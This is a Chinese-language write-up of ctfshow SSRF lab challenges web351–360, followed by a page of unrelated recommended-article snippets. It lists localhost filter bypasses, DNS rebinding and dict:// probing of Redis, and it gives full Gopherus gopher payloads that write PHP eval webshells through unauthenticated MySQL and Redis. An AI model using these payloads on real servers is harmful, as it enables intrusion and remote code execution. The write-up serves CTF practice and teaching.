北子Beizi
北子Beizi

web351-360(ctfshow刷题记录)

SSRF

web351

# curl_init — 初始化 cURL 会话    
# curl_setopt — 设置一个cURL传输选项
# curl_exec — 执行 cURL 会话
# curl_close — 关闭 cURL 会话
​

这一题并没有过滤,传入的url直接执行,所以可以使用file协议去读文件

url=file:///etc/passwd

或者直接访问该文件

url=http://127.0.0.1/flag.php
ctfshow{9fb8189e-6fea-4f05-a021-f23c4c91a97c}

web352

 hacker

虽然有过滤,但是没什么用,因为没有明确对哪个字符串进行过滤,但是规定必须使用http或https

url=http://127.0.0.1/flag.php
ctfshow{bf15c38e-afb2-434b-afea-5329ca6ce728}

web353

 hacker

这一次使用了正则匹配,且限制只能使用http(s)协议

我们可以用以下方法进行绕过

127.0.0.1
十进制整数:url=http://2130706433/flag.php
十六进制:url=http://0x7F.0.0.1/flag.php
八进制:url=http://0177.0.0.1/flag.php
十六进制整数:url=http://0x7F000001/flag.php
缺省模式:127.0.0.1写成127.1
CIDR:url=http://127.127.127.127/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php
​
ctfshow{d91f1bfd-f48d-400d-9a81-767b3f0c9d6e}

web354

 hacker

这个过滤了1和0,限制http(s)协议

第一种方法

使用http://sudo.cc,这个域名是指向127.0.0.1

url=url=http://sudo.cc/flag.php

第二种方法

302跳转

在自己的网站上面添加

 
  
第三种方法
 
  
DNS-Rebinding(dns重绑定)
 
  
自己去ceye.io注册绑定127.0.0.1然后记得前面加r
 
  
url=http://r.xxxzc8.ceye.io/flag.php
 
  
查看 profile
 
  
web351-360(ctfshow刷题记录)_第1张图片
 
  
url=http://r.xxxxxx.ceye.io/flag.php
 
  
 
   
就这道题而言,过滤了1和0,如果自己的ceye域名中有1和0,那就不能做了
 
  
 
  
web355
 
  
 hacker
 
  
这里限制了传入的url 的 host 部分的长度必须小于等于5
 
  
第一种解法
 
  
url=http://127.1/flag.php
127.1整好五位
 
  
第二种解法
 
  
url=http://0/flag.php
# 0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0
 
  
web356
 
  
 hacker
 
  
限制长度小于等于3,用上面的方法
 
  
url=http://0/flag.php
 
  
在windows中会被解析成0.0.0.0,在linux中会被解析成127.0.0.1
 
  
web357
 
  
'.$ip.'
';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}
​
​
echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?> scheme
 
  
ceye.io第一个随便填,第二个填127.0.0.1
 
  
url=http://r.xxxxxx.ceye.io/flag.php
​
39.156.66.14
ctfshow{ba38448a-6df1-45be-85f8-8c6dc1f89b5d}
 
  
web358
 
  
 
  
正则表达式的意思是以http://ctf.开头,以show结尾。 payload:http://[email protected]/flag.php?show
 
  
 
  
array(5) {
  ["scheme"]=>
  string(4) "http"
  ["host"]=>
  string(9) "127.0.0.1"
  ["user"]=>
  string(4) "ctf."
  ["path"]=>
  string(9) "/flag.php"
  ["query"]=>
  string(6) "a=show"
}
​
 
  
前面的ctf.@应该是解析成一个用户,后面就是参数,很容易理解
 
  
url=http://[email protected]/flag.php?show
ctfshow{9135f282-afb6-4abe-80c2-da78ffef26f8}
 
  
web359
 
  
 
   
SSRF打没有密码的mysql
 
  
 
  
git clone https://github.com/tarunkant/Gopherus
 
  
web351-360(ctfshow刷题记录)_第2张图片
 
  
python gopherus.py --exploit mysql
​
For making it work username should not be password protected!!!
​
Give MySQL username: root                                                                     
Give query to execute: select '' into outfile '/var/www/html/beizi.php';
 
  
Your gopher link is ready to do SSRF :                                                        
                                                                                              
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%50%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%62%65%69%7a%69%27%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%62%65%69%7a%69%2e%70%68%70%27%3b%01%00%00%00%01
 
  
_后面的进行url编码,直接写木马
 
  
web351-360(ctfshow刷题记录)_第3张图片
 
  
下面就是执行php代码进行RCE,不再展示
 
  
web360 ??
 
  
 
   
SSRF打redis
 
  
 
  
     
   
  1.  
    写webshell
     
    2.  
   
  2.  
    写ssh公钥
     
    3.  
   
  3.  
    写contrab计划反弹shell
     
    4.  
   
  4.  
    主从复制
     
    5.  
  
 
  
 
  
写webshell
 
  
 
  
打redis
 
  
 python gopherus.py --exploit redis 
​
                                                                                              
  ________              .__                                                                   
 /  _____/  ____ ______ |  |__   ___________ __ __  ______                                    
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/                                    
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \                                     
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >                                    
        \/       |__|        \/     \/                 \/                                     
                                                                                              
                author: $_SpyD3r_$                                                            
                                                                                              
​
Ready To get SHELL
​
What do you want?? (ReverseShell/PHPShell): php
​
Give web root location of server (default is /var/www/html):                                  
Give PHP Payload (We have default PHP Shell): 
​
Your gopher link is Ready to get PHP Shell:                                                   
                                                                                              
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bbeizi%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
​
When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.
 
  
直接拿着打就完了,
 
  
web351-360(ctfshow刷题记录)_第4张图片
 
  
还可以使用dict://协议,探测端口6379
 
  
url=dict://127.0.0.1:6379
 
  
返回
 
  
ERR Unknown subcommand or wrong number of arguments for 'libcurl'. Try CLIENT HELP +OK
 
  
看是否需要认证
 
  
url=dict://127.0.0.1:6379/info
 
  
不需要认证
 
  
web351-360(ctfshow刷题记录)_第5张图片
 
  
url=dict://127.0.0.1:6379/config:set:dir:/var/www/html/
 
  
再进行写马
 
  
ctfshow{6b461105-14d5-48fd-b927-c910ddd2ae6c}
 
  
 
   
CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结_OceanSec的博客-CSDN博客
 
   
CTFshow---WEB入门---(SSRF)351-360 WP - Bit's Blog
 
  
 
 
































你可能感兴趣的:(php,web安全)






    

  • php 把一个数组分成有n个元素的二维数组的算法
风清扬-独孤九剑
phpphp算法

    一、第一种解法0){$columns_map[$position]++;//这个地方格外注意,$position与$columns比较$position=($position<$columns-1)?++$position:0;$array_length--;}foreach($columns_mapas$val){$newarray[]=array_splice($array,0,$val);}
    

    • 

  • 网络安全(黑客)——自学2024
小言同学喜欢挖漏洞
web安全安全网络学习网络安全信息安全渗透测试

    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
    

    • 

  • 黑客(网络安全)技术自学30天
一个迷人的黑客
web安全安全网络笔记网络安全信息安全渗透测试

    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
    

    • 

  • 第一次用eclipse,导入项目错误Plug-in “org.eclipse.m2e.editor“ was unable to instantiate MavenPomEditor
zhangfeng1133
eclipsejavaide

    第一次用eclipse,导入项目错误Plug-in"org.eclipse.m2e.editor"wasunabletoinstantiateMavenPomEditor。各种项目包,都不存在,maven应该能自动载入类包,比Php的composer方便太多Thecontainer'MavenDependencies'referencesnonexistinglibrary'C:\Users\Ad
    

    • 

  • 自学黑客(网络安全)技术——2024最新
九九归二
web安全安全学习笔记网络网络安全信息安全

    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
    

    • 

  • php 快速入门(六)
王依硕
PHPphp开发语言

    一、前后台交互1.1$_GET用来获取浏览器通过GET方法提交的数据GET方法它是通过把参数数据加在提交表单的action属性所指的URL中,值和表单内每个字段一一对应,然后在URL中可以看到,但是有如下缺点1.安全性不好,在URL中可以看得到2.传送数据量较小,不能大于2KB1.2$_POST用来获取浏览器通过POST方法提交的数据。POST方法它是通过HTTPPOST机制,将表单的各个字段放置
    

    • 

  • Thinkphp - 详细实现网站系统登录功能,附带 Mysql 数据库设置、Web 前端展示界面、信息校验等(详细代码,即设计过程)
王佳斌
+Thinkphpmysql前端数据库

    前言登录功能,是我们几乎开发每个系统都必须的模块。登录功能设计思路,主要包括几个方面。用户输入网址展示登录页面用户输入用户名,密码等点击登录进行信息校验校验通过之后,记录用户登录信息,跳转指定页面用户校验失败,提示失败信息页面目录具体功能实现为了快速搭建可用、美观的页面,我们采用一个比较成熟的前端框架Bootstrap。下面我们到Bootstrap的官网Bootsrap官网下载bootstrap。
    

    • 

  • 【PHP】通过PHP开启/暂停Apache、MySQL或其他服务
下页、再停留
PHPphpapachemysql

    目录一、前言二、代码一、前言有些时候我们需要开启或暂停一些服务,比如说开启Apach或暂停MySQL服务等,最近工作中也开发了这方面的功能,记录下来怎样使用PHP语言来开启或暂停Apache、MySQL服务的运行状态。这种方法也适用其他服务。如果想了解怎么实时监控服务的运行状态,可以看上一篇文章【PHP】通过PHP实时监控Apache、MySQL服务运行状态-CSDN博客二、代码有三个参数需要根据
    

    • 

  • 网络安全(黑客)—2024自学笔记
羊村最强沸羊羊
web安全笔记安全网络安全网络python开发语言

    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
    

    • 

  • MineAdmin Swagger结合phpstorm实现快速客户端http调试
明日晴空
工具类PHPphpstormMineAdminSwaggerhttp调试

    以下操作,以MineAdmin框架作为演示,其它OpenApi规范文件亦可效果演示:1、打开http.json文件【OpenApi规范】,点击左侧装订线栏按钮2、点击左侧装订线栏按钮后,自动生成generated-requests.http文件,此时即可在phpstorm编辑器中直接调试接口,非常高效方便。一、下载安装MineAdmin1、gitee地址MineAdmin:MineAdmin是基于
    

    • 

  • git切换分支时,如何保存当前分支的修改(暂时不想提交)
旅行者xy

    有时候我们在一个分支中修改了部分文件,这时候,有个新的紧急任务,需要马上修改。一个好的想法是切换到一个新的分支,在新的分支上进行修改提交。可是这时候你使用gitcheckoutnew_branch时会提示错误信息:*error:Yourlocalchangestothefollowingfileswouldbeoverwrittenbycheckout:config/database.phpPle
    

    • 

  • Centos 7 yum安装php5.6.X
DomyloveR

    检查当前安装的PHP包yumlistinstalled|grepphp如果有安装的PHP包,先删除他们yumremovephp.x86_64php-cli.x86_64php-common.x86_64php-gd.x86_64php-ldap.x86_64php-mbstring.x86_64php-mcrypt.x86_64php-mysql.x86_64php-pdo.x86_64配置yum
    

    • 

  • 基于nodejs+vue智慧农业小程序python-flask-django-php
QQ_1963288475
pythonvue.js小程序flaskdjangophpnode.js

    根据此问题,研发一套智慧农业小程序,既能够大大提高信息的检索、变更与维护的工作效率,也能够方便微信小程序的管理运用,从而减少信息管理成本,提高效率。该微信小程序主要设计并完成了管理过程中的用户注册登录、个人信息修改、用户信息、知识科普、土壤信息、水质信息、购物商城等功能。该微信小程序操作简便,界面设计简洁,不但可以基本满足本行业的日常管理工作,同时又可以有效减少人员成本和时间成本,为智慧农业管理工
    

    • 

  • nodejs+vue的街道办管理系统python-flask-django-php
QQ_1963288475
pythonvue.jsflaskdjangophpnode.js

    在此基础上,结合现有街道办管理体系的特点,运用新技术,构建了以nodejs为基础的街道办管理信息化管理体系。首先,以需求为依据,根据需求分析结果进行了系统的设计,并将其划分为管理员和用户二种角色和多个主要模块:用户、住户信息、流动人口、住户居住、住户迁出、缴费信息、投诉维修理、处理信息、评价评分、核酸采样、预约信息等。使用目前市场主流的技术express框架进行项目构建,基于MVC开发模式,使用n
    

    • 

  • APP UI自动化测试思路总结
程序员老鹰
ui测试工具开发语言软件测试经验分享程序人生程序员

    首先想要说明一下,APP自动化测试可能很多公司不用,但也是大部分自动化测试工程师、高级测试工程师岗位招聘信息上要求的,所以为了更好的待遇,我们还是需要花时间去掌握的,毕竟谁也不会跟钱过不去。接下来,一起总结一下APPUI自动化测试的思路吧。一,开发语言选择通常用于自动化测试的编程语言有:Python、Java、Javascript、Ruby、C#、PHP等。一般我们会选择自己熟悉的编程语言来编写自
    

    • 

  • PHP Startup: Unable to load dynamic library '/usr/lib64/php/modules/zip.so' - libzip.so.5: cannot...
三人_

    ln-s/usr/lib64/php/modules/zip.so/usr/lib64/zip.so&&ldconfigln-s/usr/lib64/php/modules/zip.so/usr/lib64/zip.so&&ldconfig
    

    • 

  • 基于python+vue高校毕业生离校管理系统flask-django-php-nodejs
QQ511008285
pythonvue.jsflaskdjangonode.jsphp

    课题主要采用Uni-weixin、django架构技术,前端以小程序页面呈现给用户,结合后台java语言使页面更加完善,后台使用MySQL数据库进行数据存储。微信小程序主要包括学生、教务人员、宿管员、图书管理员、财务人员、离校申请、物流信息、钥匙归还、图片归还、欠费信息、催缴信息等功能,从而实现智能化的管理方式,提高工作效率。关键字:高校毕业生离校管理系统;django框架;MySQL数据库语言:
    

    • 

  • WordPress Plugin NotificationX插件 SQL注入漏洞复现(CVE-2024-1698)
OidBoy_G
漏洞复现sqlweb安全安全

    0x01产品简介WordPress和WordPressplugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。0x02漏洞概述WordPresspluginNotificationX是一个应用插件。2.8.2版本及之前存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有SQL查询缺乏充分
    

    • 

  • python社区垃圾分类管理平台的设计与实现flask-django-php-nodejs
QQ_511008285
pythonflaskdjangovue.jsphpnode.js

    近些年来,随着科技的飞速发展,互联网的普及逐渐延伸到各行各业中,给人们生活带来了十分的便利,社区垃圾分类管理平台利用计算机网络实现信息化管理,使整个社区垃圾分类管理的发展和服务水平有显著提升。语言:Python框架:django/flask软件版本:python3.7.7数据库:mysql数据库工具:Navicat前端框架:vue.js通过比较两个不同因素的框架,可以看出Flask和Django不
    

    • 

  • php短信验证码登录实现
短信接口开发

    本文为您提供了PHP语言版本的验证码短信接口对接DEMO示例//接口类型:互亿无线触发短信接口,支持发送验证码短信、订单通知短信等。//账户注册:请通过该地址开通账户http://user.ihuyi.com/?DKimmu//注意事项://(1)调试期间,请使用用系统默认的短信内容:您的验证码是:【变量】。请不要把验证码泄露给其他人。//(2)请使用APIID及APIKEY来调用接口,可在会员中
    

    • 

  • Unix运维_Unix下配置PHP-7.x.x和Apache-2.x.x
Mostcow
Unixunix运维php

    Unix运维_Unix下配置PHP-7.x.x和Apache-2.x.xApacheHTTPServer(简称Apache,音译为:阿帕奇)是Apache软件基金会的一个开放源码的网页服务器。Apache源于NCSAhttpd服务器,经过多次修改,成为世界上最流行的Web服务器软件之一。Apache可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用。它快速,可靠并且可通过简单
    

    • 

  • PHP对接验证码短信接口DEMO示例
樱桃桃

    学习编程得第N天,发现一个超简单验证码短信接口对接DEMO示例步骤1.注册互亿无线账号2.查找APIID和APIKEY3.代码的书写注册互亿无线账号网站:http://user.ihuyi.com/?JA9Ewr查找APIID和APIKEY注意事项:(1)调试期间,请使用用系统默认的短信内容:您的验证码是:【变量】。请不要把验证码泄露给其他人。//开启SESSIONsession_start();
    

    • 

  • query()方法
左手码农
PHPMySQLsqlPHPquery

    执行SQL命令,无论如何通过PHP脚本与Mysql数据库交互,过程都是一样的,创建一个SQL语句,再传递给执行查询的函数。在mysqli类中提供了几种执行SQL命令的方法,其中最常用的是query()方法。对于insert、update、delete等不会返回数据的SQL命令,query()方法在SQL命令成功执行时返回true。在此基础上还可以通过mysqli对象中的affected_rows属
    

    • 

  • 网络安全(黑客)0基础到精通,看这一篇就够了!
羊村最强沸羊羊
web安全安全网络安全php网络python开发语言

    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
    

    • 

  • 2024网络安全-自学笔记
羊村最强沸羊羊
web安全安全网络安全开发语言phppython网络

    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
    

    • 

  • PHP命令行模式详解
半桶水专家
phpphp

    PHP命令行界面(CLI)提供了一系列选项,让用户能够在命令行中执行PHP脚本、检查PHP配置等。以下是常用的一些命令行选项及其描述:-a:进入交互模式,用户可以输入PHP代码并立即执行看到结果。-c|:指定php.ini文件的路径或文件,PHP将使用该文件作为配置文件。-n:启动时不使用php.ini文件。-dfoo[=bar]:在命令行上定义ini配置项的值,如-ddisplay_errors
    

    • 

  • PHP 伪协议详解
诗雅颂
php协议伪协议

    PHP伪协议是一种特殊的URL格式,用于访问PHP内置的各种资源,如文件、变量、函数等。它们以php://开头,后面跟着不同的协议标识符和参数。下面是一些常见的PHP伪协议及其用法的详解:php://input:用于访问请求的原始数据。通常在处理POST请求时使用它。$data=file_get_contents('php://input');php://output:用于输出数据到标准输出(浏览
    

    • 

  • php 多阶段构建,Docker 重要更新: 原生支持多阶段构建(multi-stage build)
西陆强军号
php多阶段构建

    Docker的口号是Build,Ship,andRunAnyApp,Anywhere.但是我们在应用过程中会遇到一个问题,我们在build的时候,把源码也build进去了。然后就继续把源码Ship出去吗?这可不行。所有的编译型语言都面临这个困扰。即使是脚本型语言,build的时候也会使用很多上线时用不到的构建工具,而我们希望减小生产镜像的体积,这样我们的小鲸鱼才能多拉一点集装箱嘛。传统做法我们最终
    

    • 

  • 网络安全(黑客技术)—0基础自学
羊村最强沸羊羊
网络安全web安全开发语言安全phppython网络

    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
    

    • 

  • golang点击下载文件与二维码下载文件
瑶风
golang开发语言后端

    背景有一个需求,可以通过点击按钮下载apk到pc端,也可以出现一个二维码,手机端扫描二维码下载文件,通过go语言实现实现点击下载我用的是gin框架,只需要输出到上下文即可下载。用过php的都知道,下载有个最简单的办法,将内容echo出来即可。1查询apk文件的Content-Type,content-type对照表,找到apk对应application/vnd.android.package-ar
    

    • 

  • eclipse maven
IXHONG
eclipse

    eclipse中使用maven插件的时候,运行run as maven build的时候报错
-Dmaven.multiModuleProjectDirectory system propery is not set. Check $M2_HOME environment variable and mvn script match.
 
可以设一个环境变量M2_HOME指
    

    • 

  • timer cancel方法的一个小实例
alleni123
多线程timer

    package com.lj.timer;
import java.util.Date;
import java.util.Timer;
import java.util.TimerTask;
public class MyTimer extends TimerTask
{
private int a;
private Timer timer;
pub
    

    • 

  • MySQL数据库在Linux下的安装
ducklsl
mysql

    1.建好一个专门放置MySQL的目录
/mysql/db数据库目录
/mysql/data数据库数据文件目录
2.配置用户,添加专门的MySQL管理用户
>groupadd mysql ----添加用户组
>useradd -g mysql mysql ----在mysql用户组中添加一个mysql用户
3.配置,生成并安装MySQL
>cmake -D
    

    • 

  • spring------>>cvc-elt.1: Cannot find the declaration of element
Array_06
springbean

    将--------
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3
    

    • 

  • maven发布第三方jar的一些问题
cugfy
maven

    maven中发布 第三方jar到nexus仓库使用的是 deploy:deploy-file命令
有许多参数,具体可查看
http://maven.apache.org/plugins/maven-deploy-plugin/deploy-file-mojo.html
以下是一个例子:
mvn  deploy:deploy-file -DgroupId=xpp3 
    

    • 

  • MYSQL下载及安装
357029540
mysql

        好久没有去安装过MYSQL,今天自己在安装完MYSQL过后用navicat for mysql去厕测试链接的时候出现了10061的问题,因为的的MYSQL是最新版本为5.6.24,所以下载的文件夹里没有my.ini文件,所以在网上找了很多方法还是没有找到怎么解决问题,最后看到了一篇百度经验里有这个的介绍,按照其步骤也完成了安装,在这里给大家分享下这个链接的地址
    

    • 

  • ios TableView cell的布局
张亚雄
tableview

      cell.imageView.image = [UIImage imageNamed:[imageArray objectAtIndex:[indexPath row]]];
   
 
    CGSize itemSize = CGSizeMake(60, 50);
  &nbs
    

    • 

  • Java编码转义
adminjun
java编码转义

     import java.io.UnsupportedEncodingException;
/**
* 转换字符串的编码
*/
public class ChangeCharset {
/** 7位ASCII字符,也叫作ISO646-US、Unicode字符集的基本拉丁块 */
public static final Strin
    

    • 

  • Tomcat 配置和spring
aijuans
spring

    简介
Tomcat启动时,先找系统变量CATALINA_BASE,如果没有,则找CATALINA_HOME。然后找这个变量所指的目录下的conf文件夹,从中读取配置文件。最重要的配置文件:server.xml 。要配置tomcat,基本上了解server.xml,context.xml和web.xml。
Server.xml --  tomcat主
    

    • 

  • Java打印当前目录下的所有子目录和文件
ayaoxinchao
递归File

    其实这个没啥技术含量,大湿们不要操笑哦,只是做一个简单的记录,简单用了一下递归算法。
 
import java.io.File;
/**
* @author Perlin
* @date 2014-6-30
*/
public class PrintDirectory {
public static void printDirectory(File f
    

    • 

  • linux安装mysql出现libs报冲突解决
BigBird2012
linux

    linux安装mysql出现libs报冲突解决
安装mysql出现
file /usr/share/mysql/ukrainian/errmsg.sys from install of MySQL-server-5.5.33-1.linux2.6.i386 conflicts with file from package mysql-libs-5.1.61-4.el6.i686
 
    

    • 

  • jedis连接池使用实例
bijian1013
redisjedis连接池jedis

    实例代码:
package com.bijian.study;
import java.util.ArrayList;
import java.util.List;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPool;
import redis.clients.jedis.JedisPoo
    

    • 

  • 关于朋友
bingyingao
朋友兴趣爱好维持

      成为朋友的必要条件:
   志相同,道不合,可以成为朋友。譬如马云、周星驰一个是商人,一个是影星,可谓道不同,但都很有梦想,都要在各自领域里做到最好,当他们遇到一起,互相欣赏,可以畅谈两个小时。  
  志不同,道相合,也可以成为朋友。譬如有时候看到两个一个成绩很好每次考试争做第一,一个成绩很差的同学是好朋友。他们志向不相同,但他
    

    • 

  • 【Spark七十九】Spark RDD API一
bit1129
spark

    aggregate
package spark.examples.rddapi
import org.apache.spark.{SparkConf, SparkContext}
//测试RDD的aggregate方法
object AggregateTest {
def main(args: Array[String]) {
val conf = new Spar
    

    • 

  • ktap 0.1 released
bookjovi
kerneltracing

    Dear,
I'm pleased to announce that ktap release v0.1, this is the first official
release of ktap project, it is expected that this release is not fully
functional or very stable and we welcome bu
    

    • 

  • 能保存Properties文件注释的Properties工具类
BrokenDreams
properties

            今天遇到一个小需求:由于java.util.Properties读取属性文件时会忽略注释,当写回去的时候,注释都没了。恰好一个项目中的配置文件会在部署后被某个Java程序修改一下,但修改了之后注释全没了,可能会给以后的参数调整带来困难。所以要解决这个问题。
    &nb
    

    • 

  • 读《研磨设计模式》-代码笔记-外观模式-Facade
bylijinnan
java设计模式

    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/
/*
* 百度百科的定义:
* Facade(外观)模式为子系统中的各类(或结构与方法)提供一个简明一致的界面,
* 隐藏子系统的复杂性,使子系统更加容易使用。他是为子系统中的一组接口所提供的一个一致的界面
*
* 可简单地
    

    • 

  • After Effects教程收集
cherishLC
After Effects

    1、中文入门
http://study.163.com/course/courseMain.htm?courseId=730009
2、videocopilot英文入门教程(中文字幕)
http://www.youku.com/playlist_show/id_17893193.html
英文原址:
http://www.videocopilot.net/basic/
素
    

    • 

  • Linux Apache 安装过程
crabdave
apache

    Linux Apache 安装过程
 
下载新版本:
apr-1.4.2.tar.gz(下载网站:http://apr.apache.org/download.cgi)
apr-util-1.3.9.tar.gz(下载网站:http://apr.apache.org/download.cgi)
httpd-2.2.15.tar.gz(下载网站:http://httpd.apac
    

    • 

  • Shell学习 之 变量赋值和引用
daizj
shell变量引用赋值

    本文转自:http://www.cnblogs.com/papam/articles/1548679.html
Shell编程中,使用变量无需事先声明,同时变量名的命名须遵循如下规则:
首个字符必须为字母(a-z,A-Z)
中间不能有空格,可以使用下划线(_)
不能使用标点符号
不能使用bash里的关键字(可用help命令查看保留关键字)
需要给变量赋值时,可以这么写:

    

    • 

  • Java SE 第一讲(Java SE入门、JDK的下载与安装、第一个Java程序、Java程序的编译与执行)
dcj3sjt126com
javajdk

    Java SE 第一讲:
Java SE:Java Standard Edition
Java ME: Java Mobile Edition
Java EE:Java Enterprise Edition
Java是由Sun公司推出的(今年初被Oracle公司收购)。
收购价格:74亿美金
J2SE、J2ME、J2EE
JDK:Java Development 
    

    • 

  • YII给用户登录加上验证码
dcj3sjt126com
yii

    1、在SiteController中添加如下代码:
/**
* Declares class-based actions.
*/
public function actions() {
return array(
// captcha action renders the CAPTCHA image displ
    

    • 

  • Lucene使用说明
dyy_gusi
Lucenesearch分词器

    Lucene使用说明
1、lucene简介
1.1、什么是lucene
    Lucene是一个全文搜索框架,而不是应用产品。因此它并不像baidu或者googleDesktop那种拿来就能用,它只是提供了一种工具让你能实现这些产品和功能。
1.2、lucene能做什么
    要回答这个问题,先要了解lucene的本质。实际
    

    • 

  • 学习编程并不难,做到以下几点即可!
gcq511120594
数据结构编程算法

    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。
1、确定目标
学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
    

    • 

  • Java面试十问之三:Java与C++内存回收机制的差别
HNUlanwei
javaC++finalize()堆栈内存回收

    大家知道, Java 除了那 8 种基本类型以外,其他都是对象类型(又称为引用类型)的数据。 JVM 会把程序创建的对象存放在堆空间中,那什么又是堆空间呢?其实,堆( Heap)是一个运行时的数据存储区,从它可以分配大小各异的空间。一般,运行时的数据存储区有堆( Heap)和堆栈( Stack),所以要先看它们里面可以分配哪些类型的对象实体,然后才知道如何均衡使用这两种存储区。一般来说,栈中存放的
    

    • 

  • 第二章 Nginx+Lua开发入门
jinnianshilongnian
nginxlua

    Nginx入门
本文目的是学习Nginx+Lua开发,对于Nginx基本知识可以参考如下文章:
nginx启动、关闭、重启
http://www.cnblogs.com/derekchen/archive/2011/02/17/1957209.html
agentzh 的 Nginx 教程
http://openresty.org/download/agentzh-nginx-tutor
    

    • 

  • MongoDB windows安装 基本命令
liyonghui160com

     
windows安装
 
 安装目录:
 
D:\MongoDB\
 
新建目录
